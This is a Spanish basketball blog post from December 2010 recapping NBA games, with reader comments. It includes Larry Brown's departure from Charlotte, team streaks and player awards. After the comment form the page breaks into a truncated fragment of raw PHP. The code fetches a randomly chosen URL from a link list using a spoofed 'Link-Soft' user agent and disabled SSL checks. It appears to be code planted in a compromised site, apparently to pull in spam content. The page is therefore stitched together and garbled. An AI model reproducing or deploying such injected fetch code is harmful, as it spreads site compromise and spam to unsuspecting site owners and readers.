La Crónica (22/12/2010)

23 de December de 2010 por txusma

Un estilo de juego y unos resultados miserables, acrecentados por las palizas recibidas en los últimos días, han provocado que Larry Brown sea despedido  (¿renuncie?) de los Charlotte Bobcats. Michel Jordan se ha cansado del ex entrenador de los Pistons y en su lugar ha contratado a Paul Silas, hecho que refuerza un rumor que suena con fuerza en las últimas horas: un posible traspaso entre Bobcats y Clippers para que Baron Davis vuelva a Charlotte, la ciudad que le vio nacer como jugador NBA. Sería complicado ver a un jugador como Baron Davis a las órdenes de alguien tan cuadriculado como Larry Brown (que le pregunten a Raymond Felton), pero en cambio, es mucho más pausible que Davis vuelva a ser entrenador por Silas, como ya sucedió entre el 2000 y el 2003. De todas maneras un día habrá que analizar en profundidad el trabajo de Michael Jordan como propietario. No debe escaparse de rositas.

Pasando al plano puramente deportivo, los líderes mantienen sus respectivas rachas de victorias. La 14ª de Boston llegó in extremis (80-84), con remontada y polémica incluídas. Se atascaron ante la defensa de los Sixers y esta vez no encontraron desahogo desde el banco. Iguodala estuvo en condiciones de empatar el partido a escasos segundos para el final y da la impresión de que le hacen falta pero antes de eso le había hecho un flaco favor a su equipo fallando hasta 9 tiros de 11 intentos. Ray Allen fue el mejor de los verdes. Por su parte, los Spurs ganaron a los Nuggets 103-109, para firmar su segunda racha de más de 10 victorias. Melo no jugó pues parece ser que había fallecido su hermana. ¡Qué mal momento debe de estar pasando el chaval entre unas cosas y otras! Sus compañeros plantaron cara en un partido flojo de Duncan y Blair pero la segunda unidad de Popovic marcó las diferencias con las excelentes actuaciones de Gary Neal y Splitter.

Los perseguidores también ganaron todos y no hubo lugar a sorpresas. Los Hawks ni sudaron contra los Cavs (84-98); Rose y Boozer lograron doblegar a unos Wizards peleones (87-80); los Knicks cuajaron un partido completísimo contra unos Thunder algo peleados con el aro (98-112); los Hornets recuperaron la senda ganadora a costa de los Nets (91-105); los Jazz se llevaron un bonito duelo contra los Wolves (112-107) y Houston ya roza el 50% gracias a su victoria contra los Clippers (97-92).

Finalmente Calderon y los suyos se dejaron sorprender por unos Pistons extraordinarios (115-93), donde los astros se alinearon para hacer coincidir una gran actuación de Stuckey, Villanueva, Hamilton y McGrady simultáneamente. No sé si fue una casualidad ante la “férrea” defensa del equipo de Triano.

PREMIOS

MVP: Carlos Boozer se tuvo que exprimir al máximo para acabar doblegando a los Wizards Wolves. Finalmente acabó con 30 puntos, 10 rebotes y 7 asistencias.

Rookie: 24 puntos y 18 rebotes del rookie que lidera los rankings con mano de hierro. De lejos le sigue Landry Fields, que anoche cuajó una gran actuación de 14 puntos y 10 rebotes.

Sorpresa: Muy de vez en cuando se vislumbra el Rip Hamilton de los viejos tiempos. Ayer destrozó a los Raptors con 35 puntos.

Decepción: A pesar de tener la victoria en su mano, el 2 de 11 de Andre Iguodala no es de recibo. Y Rashard Lewis se estrenó en los Wizards con un 0 de 5 en triples.

Esfuerzo en vano: Aparte del esfuerzo de Blake Griffin, destacamos también el Michael Beasley. Sus 24 puntos y 10 rebotes no permitieron a los Wolves llevarse la victoria frente Utah.

Comenta

8 comentarios a esta entrada

  1. Scriers dice:
    #1

    Se fue Brown, que parece que lo estaba buscando. A ver como se organiza esta gente ahora. el resto de la jornada ha traido resultados esperados, menos la derrota de Oklahoma, por decir algo. me alegra que spliter entre en la rotacion. Y que tmac haga buenos partidos, a ver si se va animando.

      Citar

  2. TX dice:
    #2

    Hay un error: en MVP dice que “Boozer se tuvo que exprimir al máximo para acabar doblegando a los Wolves”.

      Citar

  3. Denise dice:
    #3

    Larry Brown no es santo de mi devoción, su estilo no me gusta, pero, que quiere Jordan que haga Brown con ese equipucho que le ha formado? Jordan aspira a ganar el titulo con estos Bobcats? El que debe largarse de Bobcats es Jordan que como dirigente no vale un pimiento.
    Houston por fin despierta, pero Terrence Williams no juega nada con los Rockets, problemas de disciplina?

      Citar

  4. -=TheKing=- dice:
    #4

    IEEEEEEEE para mí a Washintong le han hecho un arbotraje de pena, mucha falta en ataque con el bloqueador en movimiento… me da que les han robado 4 canastas de 3+1.

      Citar

  5. Jona dice:
    #5

    Lo del arbitraje siempre está ahí y estos equipos tienen que vivir con ello

      Citar

  6. Denise dice:
    #6

    Pues los Bobcats, o mejor dicho Jordan, parece que quiere hacer más cambios en el equipo. Segun algunos rumores, han contactado con Blazers para hacerse con Andre Miller y Camby a cambio de Gerald Wallace, Augustin y Diop

      Citar

  7. TX dice:
    #7

    Jojojo.. si Portland ficha a Wallace o Augustin estaré el primero a comprarme su camiseta

      Citar

  8. Vader dice:
    #8

    Bueno Miller es un posible expiring (hay opcion del equipo a renovarlo un año) y Camby tiene este año y otro más de contrato. Supongo que la idea de Jordan seria ir cogiendo limite salarial para dentro de un año o dos.

    La verdad es como general manager es todo lo malo que bueno era jugando. Ni en los Wizards ni en los Bobcats lo ha hecho bien.

    Tremendo lo de la hermana de Carmelo. ¿Alguien sabe que ha pasado?

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>